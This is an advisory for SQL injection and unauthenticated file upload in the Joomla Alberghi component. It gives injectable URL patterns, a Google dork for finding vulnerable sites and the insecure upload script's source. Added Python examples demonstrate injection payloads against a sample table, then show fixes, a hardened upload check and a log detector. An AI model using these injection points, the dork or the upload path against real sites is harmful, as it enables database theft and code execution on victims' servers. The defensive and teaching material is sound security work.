- ####################################################################
- # Exploit Title : Joomla Alberghi Component 2.1.3 SQL Injection / Remote File Upload
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 27/02/2019
- # Vendor Homepage : alberghi.joomlaitalia.com
- # Software Download Links : alberghi.joomlaitalia.com/files/alberghi_2_1_3_SR.zip
- joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,2566.html
- # Software Information Links :
- joomlashow.it/directory/turismo/hotel-alberghi/
- joomlaportal.ru/news/extensions/components/1538-komponent-alberghi-2-1-3
- joomla.info.tr/joomla-dersleri/alberghi-213
- artio.net/de/e-shop/joomla-extensions/joomsef/joomsef-3-extensions/alberghi-joomsef-3-extension
- # Software Affected Versions : 2.1.1, 2.1.3 and earlier versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium/High
- # Google Dorks : inurl:"/index.php?option=com_alberghi"
- # Vulnerability Types : CWE-89 [ Improper Neutralization of Special Elements
- used in an SQL Command ('SQL Injection') ]
- CWE-264 [ Permissions, Privileges, and Access Controls ]
- # Old Similar CVE : CVE-2008-1459
- cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1459
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Joomla Alberghi is a component for hotel and tourism websites, used mainly in Italy.
- ####################################################################
- Information about CVE (Common Vulnerabilities and Exposures) =>
- **********************************************************
- Note : CVE stands for Common Vulnerabilities and Exposures.
- The "Old Similar CVE" above is a reference to an earlier public identifier for this component;
- this advisory is not a copy of it but was written by the author independently and in more detail.
- The Joomla vulnerabilities described here are real and were reproduced by the author.
- We support the vendor and its software: we want fewer vulnerabilities and a more secure internet.
- CVE is designed to allow vulnerability databases and other capabilities to be linked together,
- and to facilitate the comparison of security tools and services.
- According to the CVE website, a vulnerability is a mistake in software code that provides
- an attacker with direct access to a system or network.
- It could allow an attacker to pose as a super-user or system administrator with full access privileges.
- CVE lists only publicly known vulnerabilities and exposures, which means
- skilled attackers likely know about them anyway. It takes much more work for an organization
- to protect its networks and fix all possible holes than it takes for an attacker to find
- a single vulnerability, exploit it, and compromise the network.
- There is growing agreement in the infosec community that sharing information is beneficial.
- This is reflected in the fact that the CVE Board and CNAs include key infosec organizations.
- CVE is a list of information security vulnerabilities and exposures that aims to provide
- common names for publicly known problems. The goal of CVE is to make it easier to
- share data across separate vulnerability capabilities (tools, repositories, and services)
- with this "common enumeration". Please visit cve.mitre.org/about/faqs.html for more information.
- ####################################################################
- # According to CVE-2008-1459 =>
- ********************************
- SQL injection vulnerability in the Alberghi (com_alberghi) 2.1.3 and earlier component
- for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands
- via the id, itemid, catid and startpage parameters in a detail action to index.php.
- ####################################################################
- # Impact :
- ***********
- * The Joomla Alberghi component 2.1.3 [ and other versions ] is prone to an SQL-injection
- vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit
- latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request
- to the vulnerable application and execute arbitrary SQL commands in the application's database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * The component also ships a script that lets unauthenticated users upload files. The upload script
- (upload.alberghi.php, shown below) carries a "Check if logged in" comment but performs no login check,
- takes the target directory straight from the request and uses it unsanitized in the destination path,
- so "../" sequences move the upload outside the intended folder, and sets the uploaded file to mode 0777.
- Its only name filter compares the last four characters of the name against .gif, .jpg and .png, so a
- name such as name.php.gif passes; whether such a file is then executed depends on the web server's
- handler configuration. Where it is executed, this results in arbitrary code execution within the
- context of the vulnerable application.
- ###################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_alberghi&%253BItemid=[SQL Injection]
- /index.php?option=com_alberghi&task=detail&Itemid=[ID-NUMBER]&id=[SQL Injection]
- /index.php?option=com_alberghi&task=viewAlberghi&Itemid=[SQL Injection]&letter=All
- /index.php?option=com_alberghi&Itemid=&task=viewcategory&catid=[SQL Injection]
- /index.php?option=com_alberghi&task=detail&Itemid=[ID-NUMBER]&catid=[ID-NUMBER]&id=[SQL Injection]
- /index.php?option=com_alberghi&task=viewcategory&Itemid=&catid=[ID-NUMBER]&limitstart=[ID-NUMBER]&startpage=[SQL Injection]
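- # Added example (Python, not code from the advisory or from the Alberghi component). The component's own
- SQL is not on the page, so this models the bug class behind the URLs above with an in-memory SQLite table
- of constructed sample rows: the id / catid / startpage values are concatenated into the query, a comment
- or UNION payload bypasses the state filter or dumps other columns, and the fix is an integer cast plus a
- bound parameter. The table, its rows and column names and the to_int helper are assumptions.

```python
"""Added example, not code from the advisory or the Alberghi component.

Models the CWE-89 pattern behind the com_alberghi URLs: request values are
concatenated into SQL. An in-memory SQLite table with constructed sample
rows stands in for the component's MySQL table.
"""
import sqlite3

# Constructed sample rows: (id, catid, name, state). Not real data.
ROWS = [
    (1, 1, "Hotel Roma", "published"),
    (2, 1, "Albergo Venezia", "published"),
    (3, 2, "Pensione Napoli", "unpublished"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE alberghi (id INTEGER, catid INTEGER, name TEXT, state TEXT)")
    conn.executemany("INSERT INTO alberghi VALUES (?, ?, ?, ?)", ROWS)
    return conn


def detail_vulnerable(conn, id_param):
    """task=detail: the ?id= value lands in the WHERE clause verbatim."""
    sql = f"SELECT id, name FROM alberghi WHERE id={id_param} AND state='published'"
    return conn.execute(sql).fetchall()


def viewcategory_vulnerable(conn, catid, startpage):
    """task=viewcategory: ?catid= and ?startpage= reach WHERE and LIMIT."""
    sql = (f"SELECT id, name FROM alberghi WHERE catid={catid} "
           f"AND state='published' LIMIT {startpage}, 10")
    return conn.execute(sql).fetchall()


def to_int(value, default=0):
    """Stands in for an (int) cast. Unlike PHP's intval(), '12abc' becomes 0, not 12."""
    try:
        return int(value)
    except (TypeError, ValueError):
        return default


def detail_fixed(conn, id_param):
    """Same query with the id cast to int and passed as a bound parameter."""
    return conn.execute(
        "SELECT id, name FROM alberghi WHERE id=? AND state='published'",
        (to_int(id_param),),
    ).fetchall()


def viewcategory_fixed(conn, catid, startpage):
    return conn.execute(
        "SELECT id, name FROM alberghi WHERE catid=? AND state='published' LIMIT ?, 10",
        (to_int(catid), to_int(startpage)),
    ).fetchall()


def demo():
    conn = make_db()
    return {
        # legitimate request: one published row
        "normal": detail_vulnerable(conn, "1"),
        # "-- " comments out the state filter: the unpublished row leaks too
        "comment_bypass": detail_vulnerable(conn, "0 OR 1=1 -- "),
        # UNION pulls columns the page never selects (name, state)
        "union": detail_vulnerable(conn, "0 UNION SELECT name, state FROM alberghi -- "),
        # catid is reached the same way through viewcategory
        "catid_bypass": viewcategory_vulnerable(conn, "1 OR 1=1 -- ", "0"),
        # after the fix the payload is just a non-number, i.e. id 0: no rows
        "fixed": detail_fixed(conn, "0 OR 1=1 -- "),
        "fixed_catid": viewcategory_fixed(conn, "1 OR 1=1 -- ", "0"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:15s} {rows}")
```

- The payloads use "-- " rather than a closing quote because the listed parameters are numeric and sit unquoted in
- the query; that is also why casting to int is a complete fix for these particular parameters.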
- ####################################################################
- # Vulnerable Source Code : [ upload.alberghi.php ]
- *********************************************
- <html>
- <head>
- <title>Caricamento / Upload</title>
- <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
- </head>
- <body bgcolor="#ffffff">
- </body>
- </html>
- <?php
- // Check if logged in
- define( "_VALID_MOS", 1 );
- $mode = $_GET['mode'];
- if ( $mode == "" ){
- $mode="stories_root";
- }
- $directory = $_GET['directory'];
- if ( $directory == "" )
- {
- $directory = $_POST['directory'];
- $fileupload = $_POST['fileupload'];
- }
- $userfile2=(isset($_FILES['userfile']['tmp_name']) ? $_FILES['userfile']['tmp_name'] : "");
- $userfile_name=(isset($_FILES['userfile']['name']) ? $_FILES['userfile']['name'] : "");
- if ($userfile_name != "") {
- if ($directory!="") {
- if ( $mode == "stories_root" ) {
- $base_Dir = "../../../images/stories/$directory/";
- }else if ( $mode == "alberghi_root" ){
- $base_Dir = "../../../components/com_alberghi/$directory/";
- }
- echo "BASE DIR [ $base_Dir ]";
- } else {
- echo "<script>alert('Seleziona una directory'); document.location.href='upload.alberghi.php';</script>";
- }
- if (empty($userfile_name)) {
- echo "<script>alert('Seleziona un immagine da caricare'); document.location.href='upload.alberghi.php';</script>";
- }
- $filename = split("\.", $userfile_name);
- if (eregi("[^0-9a-zA-Z_]", $filename[0])) {
- echo "<script> alert('Il nome del file deve contenere solo caratteri alfanumerici senza spaziature - File name must have only alphabetical characters with no spaces.'); window.history.go(-1);</script>\n";
- exit();
- }
- if (file_exists($base_Dir.$userfile_name)) {
- echo "<script> alert('Una immagine chiamata $userfile_name esiste già - Image $userfile_name already exists.'); window.history.go(-1);</script>\n";
- exit();
- }
- if ((strcasecmp(substr($userfile_name,-4),".gif")) && (strcasecmp(substr($userfile_name,-4),".jpg")) && (strcasecmp(substr($userfile_name,-4),".png"))) {
- echo "<script>alert('Il file deve essere un gif, png o jpg - The file must be a gif, png or jpg'); window.history.go(-1);</script>\n";
- exit();
- }
- if (eregi(".pdf", $userfile_name) || eregi(".doc", $userfile_name) || eregi(".xls", $userfile_name) || eregi(".ppt", $userfile_name)) {
- if (!move_uploaded_file ($_FILES['userfile']['tmp_name'],$media_path.$_FILES['userfile']['name']) || !chmod($media_path.$_FILES['userfile']['name'],0777)) {
- /*echo "<script>alert('Caricamento di $userfile_name fallito'); window.history.go(-1);</script>\n";*/
- exit();
- }
- else {
- echo "<script>alert('Caricamento di $userfile_name avvenuto con successo - File $userfile_name has been successfully uploaded'); window.history.go(-1);</script>\n";
- exit();
- }
- } elseif (!move_uploaded_file ($_FILES['userfile']['tmp_name'],$base_Dir.$_FILES['userfile']['name']) || !chmod($base_Dir.$_FILES['userfile']['name'],0777)) {
- /*echo "<script>alert('Caricamento di $userfile_name fallito'); window.history.go(-1);</script>\n";*/
- exit();
- }
- else {
- echo "<script>alert('Caricamento di $userfile_name avvenuto con successo - File $userfile_name has been successfully uploaded'); window.history.go(-1);</script>\n";
- exit();
- }
- }
- ?>
- <?php echo "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?".">"; ?>
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <title>Carica un file</title>
- <style>
- .button {
- color : #666666;
- border : 1px solid #666666;
- background-color : #ffffff;
- margin-top : 0px;
- font-family : arial, helvetica, sans-serif;
- font-size : 9px;
- height : 10px
- height : 10px;
- width : 140px
- width : 140px;
- }
- .inputbox {
- font-size : 10px;
- border : 1px solid #666666;
- background-color : #ffffff;
- margin-bottom : 5px;
- color : #666666;
- padding : 1px;
- }
- .title {
- font-family : Arial, Helvetica, sans-serif;
- font-size : 12px;
- color : #004080;
- }
- </style>
- </head>
- <body>
- <table border=0 topmargin=0 bgcolor=FFFFFF cellpadding=2 cellspacing=0 align="center">
- <form method="post" action="<?php $_SERVER['PHP_SELF'] ?>" enctype="multipart/form-data" name="filename">
- <tr>
- <th class="title"> Carica File / Upload File : <?php echo $directory; ?></th>
- </tr>
- <tr>
- <td align="center">
- <input class="inputbox" name="userfile" type="file" />
- </td>
- </tr>
- <tr>
- <td>
- <input class="button" type="submit" value="Carica / Upload" name="fileupload" />
- </td>
- <tr>
- <td>
- <input type="hidden" name="directory" value="<?echo $directory;?>" />
- </td>
- </tr>
- </form>
- </table>
- </body>
- </html>
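- # Added example (Python, not from the advisory or the component): the checks of upload.alberghi.php above
- re-implemented so you can see which names pass and where the file lands, next to a hardened version of the
- same decision. ROOT, the install path, is an assumption; the script location, the two base directories and
- the filter rules are taken from the source above. The hardened version does not add the missing login
- check, which belongs in Joomla's own session handling rather than in this script.

```python
"""Added example, not code from the advisory or the Alberghi component.

Re-implements the name filter and destination logic of upload.alberghi.php,
then a hardened equivalent. ROOT is an assumed install path; the script
lives in administrator/components/com_alberghi/ as the advisory states.
"""
import posixpath
import re

ROOT = "/var/www/joomla"                                   # assumption
SCRIPT_DIR = posixpath.join(ROOT, "administrator/components/com_alberghi")
BASES = {                                                  # from the script
    "stories_root": "../../../images/stories/",
    "alberghi_root": "../../../components/com_alberghi/",
}


def alberghi_accepts(name):
    """The original filter, in the original order (file_exists omitted)."""
    if name == "":
        return False, "no file"            # outer `if ($userfile_name != "")`
    stem = name.split(".")[0]              # split("\\.", $userfile_name)[0]
    if re.search(r"[^0-9a-zA-Z_]", stem):  # eregi("[^0-9a-zA-Z_]", $filename[0])
        return False, "stem not alphanumeric"
    if name[-4:].lower() not in (".gif", ".jpg", ".png"):   # strcasecmp(substr(-4))
        return False, "suffix not gif/jpg/png"
    return True, "accepted"                # shell.php.gif passes, x.jpeg does not


def alberghi_destination(mode, directory, name):
    """Where move_uploaded_file() writes, reproducing the script's quirks:
    $base_Dir is never assigned when directory is empty or mode is unknown,
    and $media_path (used when the name matches .pdf/.doc/.xls/.ppt, where
    '.' is any character) is never defined at all. PHP treats both as ''."""
    if directory == "" or mode not in BASES:
        base = ""
    else:
        base = f"{BASES[mode]}{directory}/"
    if re.search(r".pdf|.doc|.xls|.ppt", name, re.I):
        base = ""                                # the $media_path branch
    # directory is not sanitised: '../' sequences are honoured as-is.
    return posixpath.normpath(posixpath.join(SCRIPT_DIR, base + name))


SAFE_NAME = re.compile(r"[A-Za-z0-9_]{1,64}\.(gif|jpg|png)")   # whole name, one extension
SAFE_DIR = re.compile(r"[A-Za-z0-9_]{1,64}")                  # one plain path segment
MAGIC = {"gif": b"GIF8", "png": b"\x89PNG", "jpg": b"\xff\xd8\xff"}


def hardened_destination(mode, directory, name, head):
    """Hardened version. Returns (path, reason); path is None on rejection.
    `head` is the first bytes of the upload. Authentication is still
    required on top of this; the original script has none."""
    if mode not in BASES:
        return None, "unknown mode"
    if not SAFE_DIR.fullmatch(directory):
        return None, "directory must be a single plain segment"
    if not SAFE_NAME.fullmatch(name):
        return None, "name must be stem.gif|jpg|png"
    ext = name.rsplit(".", 1)[1].lower()
    if not head.startswith(MAGIC[ext]):        # content must match the extension
        return None, "content does not match extension"
    base = posixpath.normpath(posixpath.join(SCRIPT_DIR, BASES[mode], directory))
    dest = posixpath.normpath(posixpath.join(base, name))
    if not dest.startswith(base + "/"):        # containment check, belt and braces
        return None, "escapes base directory"
    return dest, "accepted"


if __name__ == "__main__":
    for n in ("shell.php.gif", "x.jpeg", "a b.gif", ".htaccess"):
        print(n, alberghi_accepts(n))
    print(alberghi_destination("alberghi_root", "", "x.png"))
    print(alberghi_destination("stories_root", "../../", "x.png"))
    print(alberghi_destination("stories_root", "hotels", "mydoc.gif"))
    print(hardened_destination("stories_root", "hotels", "x.png", b"\x89PNG\r\n\x1a\n"))
```

- Run it to see the three ways a file ends up outside the intended folder: an empty directory value, a name
- containing pdf/doc/xls/ppt, or "../" in directory. The hardened check rejects all three and also rejects
- shell.php.gif, because it matches the whole name rather than its last four characters.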
- ####################################################################
- # Arbitrary Remote File Upload Exploit :
- ***********************************
- /administrator/components/com_alberghi/upload.alberghi.php
- # Vulnerability Error :
- *******************
- Seleziona un immagine da caricare [ Select an image to upload ]
- alert('Seleziona una directory'); document.location.href='upload.alberghi.php';"; } if (empty($userfile_name)) { echo "
- [ This output matches what a browser shows when the script's source above is rendered without PHP
- processing: the body of the first <script> block and the PHP between the two <script> tags appear as
- text, and the second <script> block runs and raises the alert. On a server that executes PHP, a plain
- GET of the script returns only the upload form. ]
- # Directory File Path :
- ******************
- /administrator/components/com_alberghi/[YOURFILENAME].png .gif .jpg
- [ Per the source above: the file lands in the script's own directory when the directory parameter is
- empty ($base_Dir is never assigned) or when the file name contains pdf, doc, xls or ppt (the $media_path
- branch; $media_path is never defined). With mode=stories_root and a directory value it lands in
- /images/stories/[directory]/, with mode=alberghi_root in /components/com_alberghi/[directory]/, and
- directory is not sanitized, so ../ sequences are honoured. A .jpeg name does not pass the suffix
- check, which compares only the last four characters. ]
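- # Added example (Python, not from the advisory): a detector for the two patterns on this page, run over
- constructed Apache combined-log lines (not real traffic). The severity labels and the sample addresses are
- assumptions; the parameter names and the upload script path come from the advisory.

```python
"""Added example, not code from the advisory.

Flags two things in Apache combined-format access logs:
  * com_alberghi requests whose numeric parameters (id, Itemid, catid,
    startpage, limitstart) carry a non-integer value;
  * any request to upload.alberghi.php, rated higher for a POST or for a
    directory value containing '..'.
The log lines below are constructed for the example.
"""
import re
from urllib.parse import parse_qs, urlsplit

NUMERIC_PARAMS = ("id", "itemid", "catid", "startpage", "limitstart")
UPLOAD_SCRIPT = "/administrator/components/com_alberghi/upload.alberghi.php"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

SAMPLE_LOG = """\
203.0.113.5 - - [27/Feb/2019:10:01:02 +0000] "GET /index.php?option=com_alberghi&task=detail&Itemid=41&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Feb/2019:10:01:09 +0000] "GET /index.php?option=com_alberghi&task=detail&Itemid=41&id=12%27%20AND%201=1-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Feb/2019:10:01:15 +0000] "GET /index.php?option=com_alberghi&task=viewcategory&Itemid=&catid=2%20UNION%20SELECT%201,2,3--&limitstart=0 HTTP/1.1" 500 0 "-" "sqlmap/1.3"
198.51.100.7 - - [27/Feb/2019:10:05:00 +0000] "GET /administrator/components/com_alberghi/upload.alberghi.php HTTP/1.1" 200 1800 "-" "curl/7.64.0"
198.51.100.7 - - [27/Feb/2019:10:05:30 +0000] "POST /administrator/components/com_alberghi/upload.alberghi.php?mode=stories_root&directory=..%2F..%2F HTTP/1.1" 200 300 "-" "curl/7.64.0"
192.0.2.9 - - [27/Feb/2019:10:06:00 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""


def is_int(value):
    return re.fullmatch(r"-?\d+", value.strip()) is not None


def classify(line):
    """Return (ip, severity, reason) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # parse_qs percent-decodes once, as the server would; keep empty values
    qs = parse_qs(url.query, keep_blank_values=True)
    params = {k.lower(): v[0] for k, v in qs.items()}
    if url.path == UPLOAD_SCRIPT:
        traversal = ".." in params.get("directory", "")
        if m["method"] == "POST" or traversal:
            reason = "upload attempt via upload.alberghi.php"
            if traversal:
                reason += " with '..' in directory"
            return m["ip"], "high", reason
        return m["ip"], "medium", "unauthenticated upload script requested"
    if params.get("option") == "com_alberghi":
        for key in NUMERIC_PARAMS:
            value = params.get(key, "")
            # empty values (Itemid=) occur in ordinary links; only non-numeric content is flagged
            if value != "" and not is_int(value):
                return m["ip"], "high", f"non-integer {key}={value!r} in com_alberghi request"
    return None


def detect(log_text):
    return [hit for hit in (classify(line) for line in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, severity, reason in detect(SAMPLE_LOG):
        print(f"{severity:6s} {ip:14s} {reason}")
```

- The integer rule is deliberately blunt: because every listed parameter should be a number, it catches the
- quote, comment and UNION variants above without a payload list, at the cost of flagging typos in links.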
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################